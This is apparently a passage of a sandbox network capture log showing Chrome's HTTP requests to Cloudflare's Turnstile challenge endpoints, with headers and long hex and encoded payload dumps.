                                                                                                                                                                                                          Data Ascii: bB-pM-PcxKBirQ3GAr1rUr--MIr-rb-XFrkrtrckQsrXPea2Er+C$B2OrBrMDQbrT1C-Q7r1P--bErgPQD29rKrr1rgriP4Ar3rxDTIr1NWPbrQe8odEDKEPrr4oDrb9-Kbs2X6gIbgjYkM-Qvr6NLBiHPur9gbbI0De9Q0yTruufMjPQLWrqrXICiruayOaOPNr$eEnrl8XI-Y6vEnWEXPnAGAQKkv7jN$ArIP4rc9XTZvv2tK7rjtgEryI8AJ
                                                                                                                                                                                                          2024-12-11 23:29:07 UTC330INHTTP/1.1 200 OK
                                                                                                                                                                                                          Date: Wed, 11 Dec 2024 23:29:07 GMT
                                                                                                                                                                                                          Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                          Content-Length: 26256
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          cf-chl-gen: hjxiAtVeYeCLaLskMoBXbjQgtMdQOu+i666izG/CSsLrVxGjX0KEIxSzoqPP88T5QRqzFmZ5qZgzGugd$vCcRUeHFoV0LuWYi
                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                          CF-RAY: 8f094143ac9f41f9-EWR
                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                          2024-12-11 23:29:07 UTC1039INData Raw: 69 58 42 33 5a 59 57 4a 68 46 74 30 61 4a 52 56 63 57 47 6a 6c 4a 65 4e 6e 35 56 6b 66 35 65 5a 61 49 4e 6f 72 6d 75 49 66 57 74 6d 6a 62 4b 49 61 6f 36 45 64 36 2b 4f 74 70 61 78 74 35 2f 44 74 6e 65 7a 70 4c 71 46 68 37 4f 37 6e 73 36 72 78 62 47 6f 6e 4d 66 42 7a 38 54 48 72 4c 69 70 7a 38 66 47 70 38 36 58 31 37 76 58 33 4c 6a 44 34 71 6e 56 36 4b 76 4f 37 75 4f 75 37 65 66 78 73 2f 50 57 2b 4e 4b 7a 7a 75 76 4a 37 62 6d 35 31 62 6f 45 34 4f 2f 64 77 74 48 77 78 4e 63 4d 36 41 50 72 79 2f 37 77 2f 52 50 2b 44 66 41 4a 30 67 62 30 39 67 7a 61 39 65 66 6f 44 43 4c 61 47 2f 62 63 48 69 45 63 46 75 73 56 4a 53 72 34 36 2f 6b 75 44 51 55 73 4f 50 45 33 39 43 4d 50 4c 6a 51 7a 45 44 45 41 47 52 73 33 46 7a 35 48 4f 67 59 6b 54 45 30 4a 4d 44 45 68 4a 6b 51
                                                                                                                                                                                                          Data Ascii: iXB3ZYWJhFt0aJRVcWGjlJeNn5Vkf5eZaINormuIfWtmjbKIao6Ed6+Otpaxt5/DtnezpLqFh7O7ns6rxbGonMfBz8THrLipz8fGp86X17vX3LjD4qnV6KvO7uOu7efxs/PW+NKzzuvJ7bm51boE4O/dwtHwxNcM6APry/7w/RP+DfAJ0gb09gza9efoDCLaG/bcHiEcFusVJSr46/kuDQUsOPE39CMPLjQzEDEAGRs3Fz5HOgYkTE0JMDEhJkQ
                                                                                                                                                                                                          2024-12-11 23:29:07 UTC1369INData Raw: 59 68 4a 53 58 70 6e 65 6f 59 4a 31 2b 6e 57 4f 48 62 36 70 72 62 59 79 70 70 47 36 69 73 34 47 6f 74 5a 4f 52 65 61 32 56 71 59 31 38 75 4c 65 32 6f 70 2f 49 6e 35 76 45 66 38 69 58 70 4d 69 7a 76 71 47 50 69 4d 2f 59 32 4c 76 47 6c 72 6a 65 78 36 6a 64 72 64 76 56 73 39 6a 57 73 70 76 64 74 4e 65 72 71 4b 47 39 38 50 48 41 7a 76 54 78 34 2b 72 4f 74 39 4c 63 32 72 62 63 39 4c 76 76 34 4e 72 65 34 74 4c 48 43 76 66 66 43 50 6e 5a 44 65 2f 71 38 77 4c 6b 43 2f 62 30 31 41 72 58 30 64 58 38 47 78 6e 36 2f 66 4c 67 33 52 33 34 38 77 6b 41 48 66 62 6e 43 44 41 49 43 6a 41 45 4d 68 49 54 46 69 59 59 4d 2f 41 6e 4b 44 4d 59 45 52 76 38 48 50 34 76 2f 52 51 31 48 30 51 58 54 41 63 48 43 53 38 4e 4b 42 45 4d 49 6b 63 31 46 30 77 53 46 45 64 46 54 30 39 42 47 6c
                                                                                                                                                                                                          Data Ascii: YhJSXpneoYJ1+nWOHb6prbYyppG6is4GotZORea2VqY18uLe2op/In5vEf8iXpMizvqGPiM/Y2LvGlrjex6jdrdvVs9jWspvdtNerqKG98PHAzvTx4+rOt9Lc2rbc9Lvv4Nre4tLHCvffCPnZDe/q8wLkC/b01ArX0dX8Gxn6/fLg3R348wkAHfbnCDAICjAEMhITFiYYM/AnKDMYERv8HP4v/RQ1H0QXTAcHCS8NKBEMIkc1F0wSFEdFT09BGl
                                                                                                                                                                                                          2024-12-11 23:29:07 UTC1369INData Raw: 6e 57 4f 69 61 5a 6c 74 70 6e 43 69 71 48 4f 44 74 49 4f 41 62 71 53 43 72 62 46 36 6e 4a 6d 66 74 34 75 77 65 6e 75 6e 77 6f 69 63 68 73 65 31 70 34 44 4d 75 4d 6d 74 30 4b 4b 6e 72 64 4b 55 74 63 32 6e 31 61 71 31 76 4c 4f 30 6d 5a 57 65 70 62 61 77 70 38 44 68 32 63 6d 72 32 4b 72 6f 36 38 2b 2b 79 2f 50 52 78 64 66 43 31 63 66 37 79 65 6e 63 33 67 4b 34 74 66 7a 41 38 75 66 42 30 64 72 55 35 63 33 2b 43 63 6f 51 45 76 33 30 79 39 50 4f 44 39 62 7a 44 65 7a 37 47 52 44 66 48 76 41 43 2f 50 72 79 33 2f 72 69 47 4f 55 43 48 78 44 6d 4c 43 73 53 38 2f 51 6d 46 77 49 6b 49 69 59 37 38 76 59 4c 50 53 34 76 4e 77 41 7a 46 54 74 47 4a 78 51 65 53 6b 77 4c 4c 52 6b 35 45 44 41 78 4b 6b 39 55 55 42 51 34 4b 54 6b 55 4c 43 39 51 4f 52 35 64 58 44 4e 58 49 53 41
                                                                                                                                                                                                          Data Ascii: nWOiaZltpnCiqHODtIOAbqSCrbF6nJmft4uwenunwoichse1p4DMuMmt0KKnrdKUtc2n1aq1vLO0mZWepbawp8Dh2cmr2Kro68++y/PRxdfC1cf7yenc3gK4tfzA8ufB0drU5c3+CcoQEv30y9POD9bzDez7GRDfHvAC/Pry3/riGOUCHxDmLCsS8/QmFwIkIiY78vYLPS4vNwAzFTtGJxQeSkwLLRk5EDAxKk9UUBQ4KTkULC9QOR5dXDNXISA
                                                                                                                                                                                                          2024-12-11 23:29:07 UTC1369INData Raw: 57 36 6d 68 4b 57 4d 70 36 69 6f 74 70 6d 75 70 71 6c 7a 72 4a 4e 2f 69 37 4a 38 6f 58 32 46 70 49 66 43 66 4d 69 6d 78 35 2b 6b 6d 62 6d 69 69 36 6a 50 6b 36 79 57 72 35 65 32 71 4a 6e 50 70 2b 48 63 6d 4d 2b 30 73 71 50 49 6f 75 58 56 77 39 37 4f 71 4d 48 68 34 2b 54 4c 7a 36 32 2b 7a 4e 4c 76 74 76 6e 4d 2b 63 6e 4f 30 62 50 37 41 4e 37 76 35 4d 44 78 32 77 7a 6d 44 4e 67 48 35 41 6e 63 41 4d 76 65 38 67 55 41 38 75 67 46 46 64 7a 36 33 68 59 52 36 51 4d 65 44 69 59 6e 39 74 34 64 38 68 2f 6c 47 66 34 64 37 2b 67 6e 45 42 45 72 42 67 76 71 38 77 34 6f 50 53 30 59 43 6a 6b 2f 51 54 77 4e 41 51 55 79 52 52 59 49 4c 53 49 70 51 6b 77 2f 50 52 38 69 49 43 63 67 4a 79 51 34 4f 56 6f 55 4e 6a 67 7a 59 57 49 67 49 54 56 67 4d 6a 70 69 4e 6c 30 31 50 79 31 69
                                                                                                                                                                                                          Data Ascii: W6mhKWMp6iotpmupqlzrJN/i7J8oX2FpIfCfMimx5+kmbmii6jPk6yWr5e2qJnPp+HcmM+0sqPIouXVw97OqMHh4+TLz62+zNLvtvnM+cnO0bP7AN7v5MDx2wzmDNgH5AncAMve8gUA8ugFFdz63hYR6QMeDiYn9t4d8h/lGf4d7+gnEBErBgvq8w4oPS0YCjk/QTwNAQUyRRYILSIpQkw/PR8iICcgJyQ4OVoUNjgzYWIgITVgMjpiNl01Py1i
                                                                                                                                                                                                          2024-12-11 23:29:07 UTC1369INData Raw: 4f 6a 71 71 56 78 71 61 61 78 63 48 71 38 6c 33 75 67 6a 6e 32 61 70 63 48 45 76 4a 57 58 6f 73 53 35 69 63 69 4c 77 4c 4c 4d 6c 4d 4b 53 6c 5a 62 46 6c 39 76 4e 74 4b 72 4e 7a 37 37 6b 34 38 58 46 32 39 7a 44 36 4c 57 35 71 72 33 5a 37 2b 50 6e 38 65 4c 33 78 2b 2f 51 74 50 7a 7a 2b 4c 37 32 2b 74 6a 78 31 63 2f 46 39 75 63 43 38 77 7a 6f 32 39 72 57 79 67 6e 77 41 78 4d 57 35 4f 6f 55 42 78 72 74 30 38 34 54 2f 53 44 53 39 41 44 62 2b 75 50 32 35 69 58 6e 39 75 59 59 41 53 6e 6f 48 2f 33 37 37 41 6b 7a 4d 75 34 6b 47 52 44 33 4b 54 38 37 50 2f 4c 37 2f 55 55 78 51 79 67 45 43 54 38 6a 43 45 6f 70 43 41 74 4d 4a 68 74 55 42 30 64 53 43 69 34 6c 50 46 77 78 53 32 42 67 4e 7a 55 67 49 56 41 31 4f 43 5a 6d 56 31 73 6a 5a 30 55 70 4b 31 78 66 61 53 5a 6a 53
                                                                                                                                                                                                          Data Ascii: OjqqVxqaaxcHq8l3ugjn2apcHEvJWXosS5iciLwLLMlMKSlZbFl9vNtKrNz77k48XF29zD6LW5qr3Z7+Pn8eL3x+/QtPzz+L72+tjx1c/F9ucC8wzo29rWygnwAxMW5OoUBxrt084T/SDS9ADb+uP25iXn9uYYASnoH/377AkzMu4kGRD3KT87P/L7/UUxQygECT8jCEopCAtMJhtUB0dSCi4lPFwxS2BgNzUgIVA1OCZmV1sjZ0UpK1xfaSZjS
                                                                                                                                                                                                          2024-12-11 23:29:07 UTC1369INData Raw: 33 6a 49 69 2f 69 70 47 4f 77 37 2b 57 6b 62 6a 48 6c 35 61 37 78 38 69 5a 6d 5a 32 73 72 4b 32 79 70 4c 4f 50 74 73 61 35 6c 61 61 2f 72 4c 79 68 75 63 47 63 6e 64 58 45 78 64 50 48 79 62 57 74 75 73 33 68 37 2b 48 42 38 74 58 46 77 38 54 6a 30 63 6e 36 36 39 44 53 79 4e 33 59 30 51 55 45 31 74 50 68 32 74 66 71 41 4f 37 33 36 4d 67 51 38 2b 44 78 41 66 58 32 7a 2f 72 31 39 50 58 64 36 76 30 53 49 42 4c 78 49 77 62 31 38 2f 51 55 41 76 6b 72 48 41 45 44 2b 41 34 4a 41 6a 55 30 42 77 51 53 43 77 67 4a 47 69 6b 65 48 7a 51 38 4a 43 4c 38 51 54 59 68 41 68 63 35 4a 54 39 41 50 43 6b 65 53 42 49 6b 4c 6c 41 6c 49 56 67 6a 4b 69 64 63 57 43 38 71 55 57 41 77 4c 31 52 67 59 54 49 79 4e 6b 56 46 52 6b 74 4f 54 53 6b 79 51 6c 4d 74 63 55 35 58 4d 58 6c 4b 57 6e
                                                                                                                                                                                                          Data Ascii: 3jIi/ipGOw7+WkbjHl5a7x8iZmZ2srK2ypLOPtsa5laa/rLyhucGcndXExdPHybWtus3h7+HB8tXFw8Tj0cn669DSyN3Y0QUE1tPh2tfqAO736MgQ8+DxAfX2z/r19PXd6v0SIBLxIwb18/QUAvkrHAED+A4JAjU0BwQSCwgJGikeHzQ8JCL8QTYhAhc5JT9APCkeSBIkLlAlIVgjKidcWC8qUWAwL1RgYTIyNkVFRktOTSkyQlMtcU5XMXlKWn
                                                                                                                                                                                                          2024-12-11 23:29:07 UTC1369INData Raw: 74 72 69 79 70 6f 43 71 75 71 71 2f 71 72 69 76 6e 59 6d 39 72 62 47 52 74 4c 53 31 6d 63 65 36 6c 4a 6e 4a 76 39 4f 64 73 38 47 63 6f 64 54 48 74 61 48 54 79 71 54 73 33 73 37 4d 35 4e 76 54 30 73 62 6a 31 4f 7a 4b 35 39 72 5a 2f 4f 7a 5a 33 66 7a 77 34 74 47 39 39 65 54 6d 32 75 6a 70 78 4d 6e 66 37 63 6a 75 2b 2f 4c 78 46 51 4c 31 30 65 59 48 2b 67 38 52 43 66 33 5a 38 67 45 45 38 53 55 53 42 51 62 68 46 67 59 4b 4c 52 6b 51 44 77 4d 68 45 2b 30 44 4a 52 67 47 39 51 77 62 43 77 38 72 48 2f 6a 35 4d 43 51 34 49 7a 4d 6f 46 54 30 31 4b 77 55 47 4f 69 38 66 49 7a 77 78 4d 67 35 47 4d 6a 63 6e 52 6a 6c 52 4b 30 39 41 4c 68 35 42 51 30 4a 48 4f 45 59 69 4d 31 74 4d 53 6d 6c 5a 54 7a 38 2f 59 6b 35 54 51 32 46 58 56 6e 56 6b 58 45 74 48 61 57 42 64 64 58 4e
                                                                                                                                                                                                          Data Ascii: triypoCquqq/qrivnYm9rbGRtLS1mce6lJnJv9Ods8GcodTHtaHTyqTs3s7M5NvT0sbj1OzK59rZ/OzZ3fzw4tG99eTm2ujpxMnf7cju+/LxFQL10eYH+g8RCf3Z8gEE8SUSBQbhFgYKLRkQDwMhE+0DJRgG9QwbCw8rH/j5MCQ4IzMoFT01KwUGOi8fIzwxMg5GMjcnRjlRK09ALh5BQ0JHOEYiM1tMSmlZTz8/Yk5TQ2FXVnVkXEtHaWBddXN
                                                                                                                                                                                                          2024-12-11 23:29:07 UTC1369INData Raw: 36 47 2b 72 70 2b 6a 71 36 6e 50 71 63 61 32 70 36 69 51 7a 39 69 31 74 73 6a 47 72 71 79 39 31 37 33 42 34 4c 53 38 35 2b 69 33 76 4b 50 67 32 73 36 38 30 61 7a 43 77 4e 48 72 30 64 58 30 34 39 54 75 37 37 37 64 37 2f 7a 50 31 4c 76 33 42 65 49 4a 35 63 54 66 32 4d 77 44 35 42 48 79 36 65 54 77 39 75 66 6f 30 42 41 54 39 66 59 56 42 2f 48 38 46 42 6f 43 46 66 37 33 2b 50 55 67 46 41 55 48 41 77 41 43 2f 42 4d 45 42 4f 77 73 4b 78 49 54 47 79 4d 4e 47 54 41 79 48 6a 49 4c 46 42 67 53 50 44 41 68 49 7a 6b 63 49 79 6b 75 4e 79 4d 63 4b 7a 34 71 53 45 78 41 4d 54 51 6a 4c 43 38 6f 4e 30 6f 32 55 30 4d 30 4e 7a 41 2f 55 7a 35 63 59 46 52 46 52 30 74 41 51 7a 78 4c 58 30 70 6e 56 30 68 4c 52 46 4e 6b 55 6e 42 30 61 46 6c 62 59 31 52 58 55 46 39 77 58 6e 74 72
                                                                                                                                                                                                          Data Ascii: 6G+rp+jq6nPqca2p6iQz9i1tsjGrqy9173B4LS85+i3vKPg2s680azCwNHr0dX049Tu777d7/zP1Lv3BeIJ5cTf2MwD5BHy6eTw9ufo0BAT9fYVB/H8FBoCFf73+PUgFAUHAwAC/BMEBOwsKxITGyMNGTAyHjILFBgSPDAhIzkcIykuNyMcKz4qSExAMTQjLC8oN0o2U0M0NzA/Uz5cYFRFR0tAQzxLX0pnV0hLRFNkUnB0aFlbY1RXUF9wXntr


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          26192.168.2.449786104.18.95.414431748C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          2024-12-11 23:29:09 UTC599OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/2052973775:1733955903:mwgDOxztvG-5XDI8u3krRI0LqZnjx6ACV_1HL3xWCHg/8f0940fe6c4f4373/CVmrfugbA_zqktzvG3JcRgs_mC_rv53iYzPMW._IILw-1733959736-1.1.1.1-UvbuVkQKEJNelwu1lbxWxXa26svM2baBo3khA2S2NQujCVwstPaAd55J9oE_yBaL HTTP/1.1
                                                                                                                                                                                                          Host: challenges.cloudflare.com
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                          2024-12-11 23:29:09 UTC379INHTTP/1.1 404 Not Found
                                                                                                                                                                                                          Date: Wed, 11 Dec 2024 23:29:09 GMT
                                                                                                                                                                                                          Content-Type: application/json
                                                                                                                                                                                                          Content-Length: 7
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          cf-chl-out: Mkj9qgeTaoqTS58wpCSCq7AJyMB+9Cwnt0o=$PuRSVuC3tSVHk0bh
                                                                                                                                                                                                          cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                          CF-RAY: 8f0941516e2d41ec-EWR
                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                          2024-12-11 23:29:09 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                                                                                                                          Data Ascii: invalid


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          27192.168.2.449787104.18.94.414431748C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          2024-12-11 23:29:12 UTC1172OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/2052973775:1733955903:mwgDOxztvG-5XDI8u3krRI0LqZnjx6ACV_1HL3xWCHg/8f0940fe6c4f4373/CVmrfugbA_zqktzvG3JcRgs_mC_rv53iYzPMW._IILw-1733959736-1.1.1.1-UvbuVkQKEJNelwu1lbxWxXa26svM2baBo3khA2S2NQujCVwstPaAd55J9oE_yBaL HTTP/1.1
                                                                                                                                                                                                          Host: challenges.cloudflare.com
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Content-Length: 34041
                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                          Content-type: application/x-www-form-urlencoded
                                                                                                                                                                                                          CF-Chl-RetryAttempt: 0
                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                          CF-Challenge: CVmrfugbA_zqktzvG3JcRgs_mC_rv53iYzPMW._IILw-1733959736-1.1.1.1-UvbuVkQKEJNelwu1lbxWxXa26svM2baBo3khA2S2NQujCVwstPaAd55J9oE_yBaL
                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                          Origin: https://challenges.cloudflare.com
                                                                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/ahw4n/0x4AAAAAAA1QAANc6ALCga__/auto/fbE/normal/auto/
                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                          2024-12-11 23:29:12 UTC16384OUTData Raw: 76 5f 38 66 30 39 34 30 66 65 36 63 34 66 34 33 37 33 3d 43 6b 2d 50 4a 62 32 4f 44 62 44 63 6b 72 4f 41 46 31 72 30 50 34 50 4d 44 72 6b 51 37 72 4b 74 50 61 4b 44 62 59 72 63 50 63 2d 32 59 72 41 74 72 4d 41 50 72 4e 2d 72 65 50 43 2d 51 45 72 4d 47 70 32 72 32 24 72 61 55 4b 5a 2d 72 50 4d 4d 72 6b 50 65 76 77 72 35 32 2d 62 33 72 56 49 72 77 77 72 59 4b 39 49 72 54 50 51 63 71 43 39 4d 76 4e 72 43 57 35 7a 4a 2d 43 39 4d 46 72 56 50 32 4f 72 51 34 34 51 25 32 62 2d 72 71 7a 72 72 71 4d 39 72 30 72 65 43 74 72 72 76 54 46 4e 51 72 73 7a 6f 6a 46 49 72 36 4f 63 4a 44 33 43 6b 7a 46 33 62 49 69 49 73 6b 72 47 44 69 24 48 6c 43 62 39 39 72 39 33 62 7a 51 36 49 72 63 4b 45 6b 4d 7a 37 33 24 2d 61 31 50 4d 35 6e 31 6f 4d 33 33 2b 68 58 64 24 37 7a 2d 54 4c
                                                                                                                                                                                                          Data Ascii: v_8f0940fe6c4f4373=Ck-PJb2ODbDckrOAF1r0P4PMDrkQ7rKtPaKDbYrcPc-2YrAtrMAPrN-rePC-QErMGp2r2$raUKZ-rPMMrkPevwr52-b3rVIrwwrYK9IrTPQcqC9MvNrCW5zJ-C9MFrVP2OrQ44Q%2b-rqzrrqM9r0reCtrrvTFNQrszojFIr6OcJD3CkzF3bIiIskrGDi$HlCb99r93bzQ6IrcKEkMz73$-a1PM5n1oM33+hXd$7z-TL
                                                                                                                                                                                                          2024-12-11 23:29:12 UTC16384OUTData Raw: 62 42 2d 70 4d 2d 50 63 78 4b 42 69 72 51 33 47 41 72 31 72 55 72 2d 2d 4d 49 72 2d 72 62 2d 58 46 72 6b 72 74 72 63 6b 51 73 72 58 50 65 61 32 45 72 2b 43 24 42 32 4f 72 42 72 4d 44 51 62 72 54 31 43 2d 51 37 72 31 50 2d 2d 62 45 72 67 50 51 44 32 39 72 4b 72 72 31 72 67 72 69 50 34 41 72 33 72 78 44 54 49 72 31 4e 57 50 62 72 51 65 38 6f 64 45 44 4b 45 50 72 72 34 6f 44 72 62 39 2d 4b 62 73 32 58 36 67 49 62 67 6a 59 6b 4d 2d 51 76 72 36 4e 4c 42 69 48 50 75 72 39 67 62 62 49 30 44 65 39 51 30 79 54 72 75 75 66 4d 6a 50 51 4c 57 72 71 72 58 49 43 69 72 75 61 79 4f 61 4f 50 4e 72 24 65 45 6e 72 6c 38 58 49 2d 59 36 76 45 6e 57 45 58 50 6e 41 47 41 51 4b 6b 76 37 6a 4e 24 41 72 49 50 34 72 63 39 58 54 5a 76 76 32 74 4b 37 72 6a 74 67 45 72 79 49 38 41 4a
                                                                                                                                                                                                          Data Ascii: bB-pM-PcxKBirQ3GAr1rUr--MIr-rb-XFrkrtrckQsrXPea2Er+C$B2OrBrMDQbrT1C-Q7r1P--bErgPQD29rKrr1rgriP4Ar3rxDTIr1NWPbrQe8odEDKEPrr4oDrb9-Kbs2X6gIbgjYkM-Qvr6NLBiHPur9gbbI0De9Q0yTruufMjPQLWrqrXICiruayOaOPNr$eEnrl8XI-Y6vEnWEXPnAGAQKkv7jN$ArIP4rc9XTZvv2tK7rjtgEryI8AJ
                                                                                                                                                                                                          2024-12-11 23:29:12 UTC1273OUTData Raw: 63 45 52 55 72 58 45 32 62 69 68 4e 65 44 67 64 34 58 72 2d 68 38 67 72 75 4f 75 71 4d 46 72 48 50 62 4d 72 6b 72 6f 50 24 6a 43 66 69 69 63 4f 49 4d 7a 51 56 49 54 72 5a 31 4d 55 39 58 50 51 66 72 6b 6a 33 44 51 59 7a 4a 50 54 71 30 56 41 32 45 46 47 65 4a 6f 32 72 2d 7a 57 34 65 64 72 51 69 38 45 35 24 72 4b 44 51 46 4c 77 50 62 5a 63 2d 4b 78 4a 71 4c 57 33 55 46 2d 38 69 7a 52 70 6f 50 54 61 72 68 32 37 67 34 44 49 77 68 6c 72 32 70 56 50 72 46 44 51 2d 32 61 36 71 47 52 2b 4d 5a 72 66 41 56 76 62 2d 34 77 4d 63 73 71 33 48 4a 72 54 35 75 62 72 70 65 56 72 58 58 70 41 59 79 7a 52 6a 63 39 50 34 49 38 6a 43 57 68 38 6c 56 4a 50 69 63 51 55 57 4d 72 31 48 59 41 62 72 74 58 6c 5a 50 51 56 41 46 50 4c 54 4d 6e 72 54 56 46 57 39 44 72 54 39 37 4d 50 59 64
                                                                                                                                                                                                          Data Ascii: cERUrXE2bihNeDgd4Xr-h8gruOuqMFrHPbMrkroP$jCfiicOIMzQVITrZ1MU9XPQfrkj3DQYzJPTq0VA2EFGeJo2r-zW4edrQi8E5$rKDQFLwPbZc-KxJqLW3UF-8izRpoPTarh27g4DIwhlr2pVPrFDQ-2a6qGR+MZrfAVvb-4wMcsq3HJrT5ubrpeVrXXpAYyzRjc9P4I8jCWh8lVJPicQUWMr1HYAbrtXlZPQVAFPLTMnrTVFW9DrT97MPYd
                                                                                                                                                                                                          2024-12-11 23:29:13 UTC1343INHTTP/1.1 200 OK
                                                                                                                                                                                                          Date: Wed, 11 Dec 2024 23:29:12 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                          Content-Length: 4504
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          cf-chl-out: quAzDp6TFQ6M89sFvoJ/Gt9Ee4w06D0ekDCEpoIqpaVP7ZNShrBeL4SIAYBiH1Oj5RKEAbRWgXydLtlkkrjKu22L1wvSpQt6W5ITQ/PahFgroqhD0dsfMm8=$5c0dJNCszLDh/5HF
                                                                                                                                                                                                          cf-chl-out-s: kLiccfnTQvJxskhTaZ+/bKj3xn1zZP0Un8DyR2Zr2rKXHfFpZYl0MNNIvcW54XDGPypr0x6urLOt3/FP/KrSMDSRwzaGugN24oWFHgDg6311ApYz8RqIR/LtyrmKwQLipNu+kbGB4wtTGPTByFV2qt2imbGCjaWQ0AIZKg9TzwEpXmY23vTZj4LwxOJ55XqdtpETZOORuNIM6zOluhpcGR3UZ8VFdt1kAeaQ7PogvQNC63myBGNEOhhr7sZVNoJOPwH0y9mnP4nLjVY+X9VimrRTB5aq6OY1aN39dgP1oXAEMWeS1Dxm1vYdETmZluP4PPKQ8xzlFkA21D778DVbpc2niodlwODnAKtatmj+m1nvT8ESwym7UY6lmkag0nI3tX52xndY1rm2L3fLmVYew3obJNZvZXvNaRHom2nwXF5JFosnyOs2QlNSiWEqfL/6zcnG6xOCxNr7fMEdoXNojB6fLboPCbT47cW7JnORxbOIFw9p6pTnazfLvOe8pf+8h4fwgM10ycaasNU++wwqoIcWYXsBFACPPg6tsV/5qjtwlfxqRjqaAoZQxPmGsLPOhYHbvsrMGtPIskqoGg/hvBN9oqx5mwiWisdOS7z212RE/RFXyl/PNlK5iYOZ1ETHYhBT5uvwjX4azQ9vyVv9qeYv2uvn7k1grk2KweYpTutd1xRBnNvD+XGNRgveymZ/ONc0SXX6zO3HjQVwKVo2QKtQejpmHXknt5Y/qeaWzEIgSbexrS/ni27EvSJVclOUffneN7QjXXH9iNJoN3nkmuKmumtA7to1oQ42qIw3WMDd5teMZTZ4D7X/Tn29/FbVCRkl3Sx308I9CEJ7wNs8oWCOSmjuP5fegFZBT2fpYXEBbM+Eyh9Um0vvn0hepfGpVl+y3OIV8nxI7voIaGB+sBNZ3i+oLqA5mbMDjOyTIqyeZ6CGLIi3DQsuR3p1SVaxJrDkRcuX5mEyjlWXrXzsfvc25v9gUEIwqGLqm/2e6Fc=$f3UC+ [TRUNCATED]
                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                          2024-12-11 23:29:13 UTC62INData Raw: 43 46 2d 52 41 59 3a 20 38 66 30 39 34 31 36 35 35 65 61 37 34 33 62 37 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: CF-RAY: 8f0941655ea743b7-EWRalt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                          2024-12-11 23:29:13 UTC1333INData Raw: 69 58 42 33 5a 59 57 4a 68 46 74 30 61 4a 52 56 63 57 47 6a 6c 4a 65 4e 70 32 47 6f 70 70 2b 6a 71 49 57 71 67 47 4b 47 66 4a 4f 6a 63 61 36 43 71 62 43 54 75 36 35 76 71 35 75 35 75 4c 71 67 76 62 79 2b 74 4c 79 47 68 37 65 37 69 4b 53 59 77 37 33 4c 77 38 62 4f 79 71 6a 49 75 70 53 6e 79 71 32 31 6d 39 36 64 76 4c 33 54 78 63 43 31 32 39 4b 38 75 4e 57 6a 76 4e 6e 6e 79 62 33 71 73 4f 47 73 37 38 48 71 7a 38 37 6e 37 62 6e 34 31 50 48 4c 42 4c 7a 6b 34 74 33 64 2f 51 62 46 39 75 73 4f 7a 66 37 79 37 41 58 4f 41 2b 54 57 45 78 54 6f 43 78 51 57 46 79 41 5a 39 66 58 73 41 77 4d 65 35 52 62 38 39 2b 49 75 4b 66 30 73 48 53 37 74 41 79 67 6c 4c 69 77 30 4a 2f 63 39 47 41 77 79 4f 50 73 54 44 44 6f 38 47 42 45 35 42 44 39 41 51 43 34 63 4b 67 77 6b 45 6a 73
                                                                                                                                                                                                          Data Ascii: iXB3ZYWJhFt0aJRVcWGjlJeNp2Gopp+jqIWqgGKGfJOjca6CqbCTu65vq5u5uLqgvby+tLyGh7e7iKSYw73Lw8bOyqjIupSnyq21m96dvL3TxcC129K8uNWjvNnnyb3qsOGs78Hqz87n7bn41PHLBLzk4t3d/QbF9usOzf7y7AXOA+TWExToCxQWFyAZ9fXsAwMe5Rb89+IuKf0sHS7tAyglLiw0J/c9GAwyOPsTDDo8GBE5BD9AQC4cKgwkEjs
